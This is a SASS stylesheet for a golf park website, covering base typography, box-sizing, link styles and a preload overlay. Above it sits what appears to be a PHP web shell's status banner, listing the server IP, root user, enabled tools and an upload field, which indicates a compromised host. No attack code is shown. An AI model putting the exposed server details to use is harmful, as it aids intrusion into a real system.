| Server IP : 14.225.204.176 / Your IP : 216.73.216.6 Web Server : nginx/1.24.0 System : Linux nodejs-ybgk 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64 User : root ( 0) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/php/harmoniegolfpark.com/assets/sass/ |
Upload File : |
// TYPE
// ==========================================================================
* {
-moz-osx-font-smoothing: grayscale;
-webkit-font-smoothing: antialiased;
box-sizing: border-box;
margin: 0;
padding: 0;
}
html {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
* {
&,
&:before,
&:after {
-webkit-box-sizing: inherit;
-moz-box-sizing: inherit;
box-sizing: inherit;
}
}
$inuit-global-border-box: true;
html {
@include font-weight( $base-font-weight );
font-family: $base-font-family;
font-size: ($base-font-size / 16px) * 0.8em; // [1]
line-height: $base-line-height / $base-font-size; // [1]
background-color: $color-base-bg;
color: $color-base-txt;
overflow-y: scroll; // [2]
min-height: 100%; // [3]
-webkit-text-size-adjust: 100%; // [4]
-ms-text-size-adjust: 100%; // [4]
// -moz-osx-font-smoothing: grayscale; // [5]
// -webkit-font-smoothing: antialiased; // [5]
-ms-touch-action: manipulation;
touch-action: manipulation;
}
@media screen and (min-width: 80em) {
html {
font-size: ($small-font-size / 16px) * 1em; // [1]
}
}
html[lang='ja'] {
font-family: $font-japanese;
font-size: 32px;
}
// Emboldened elements.
html[lang='en-US'] {
dt {
@include font-weight( semibold );
}
}
// Horizontal rules.
hr {
border: none;
border-bottom: 1px solid $color-gray-ccc;
margin-bottom: $base-spacing-unit - 1px;
}
blockquote {
margin: 0 2.5em;
font-style: italic;
color: $color-gray;
}
abbr {
cursor: help;
}
acronym {
text-transform: uppercase;
border-bottom: 1px dashed #666;
cursor: help;
}
/* Delete and insert */
ins, dfn {
font-style: italic;
text-decoration: none;
border-bottom: 1px solid #666;
}
a {
color: $color-base-link;
text-decoration: none;
transition: 0.2s;
cursor: pointer;
@include attention() {
color: $color-brand-1;
text-decoration: underline;
}
}
%vertical-align {
position: relative;
top: 50%;
transform: translateY(-50%);
}
%grayscale {
filter: grayscale(100%);
transition: filter $default-duration;
}
%none-grayscale {
filter: grayscale(0);
}
%fl {
float: left;
}
%fr {
float: right;
}
%fn {
float: none;
}
%list-unstyled {
list-style: none;
}
.main {
min-height: 500px;
}
.preload {
z-index: 1;
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
z-index: 99999;
background: rgba($color-black, 1);
.logo {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
width: 100px;
}
@include media-breakpoint-up(md) {
.logo {
width: auto;
}
}
}